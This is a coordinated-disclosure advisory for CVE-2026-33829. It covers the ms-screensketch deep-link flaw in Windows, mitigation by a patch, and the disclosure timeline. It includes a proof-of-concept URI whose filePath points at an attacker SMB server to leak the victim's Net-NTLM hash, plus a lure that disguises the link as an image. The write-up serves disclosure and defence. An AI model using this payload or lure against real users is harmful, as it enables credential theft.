One‑Click NTLM Leak in ms‑screensketch: How the Vulnerability Works

Vulnerability Overview

Specific releases of the Windows screenshot application ms-screensketch register a deep‑link protocol. The protocol’s filePath parameter can be crafted to force an authenticated SMB connection to an arbitrary server, causing the user’s Net‑NTLM hash to be transmitted.

<Extensions>
    <uap:Extension Category="windows.protocol">
        <uap:Protocol Name="ms-screensketch" DesiredView="default"/>
    </uap:Extension>
    ...
</Extensions>

Proof of Concept

Deploy an SMB listener on a server controlled by the attacker.

In a browser, open a URL that invokes the deep‑link and points to the attacker’s SMB server.

ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=Toast

Attack Scenario

The screenshot tool automatically opens remote resources. An attacker can host a URL that appears to be a direct image link, for example https://snip.example.com/wallpaper/image.png. The page serves an HTML payload that triggers the deep‑link, causing the tool to launch, open the remote SMB share, and perform NTLM authentication silently in the background. Social engineering can increase credibility by framing the link as a request to edit a company wallpaper or badge photo.

Mitigation

Install the security update released by Microsoft on 2026‑04‑14, which patches the deep‑link validation flaw.

Disclosure Timeline

2026‑03‑23 – Vulnerability reported to the vendor.

2026‑04‑14 – Vendor released the fix.

2026‑04‑14 – Coordinated public disclosure.

References

CVE-2026-33829

GitHub repository: https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829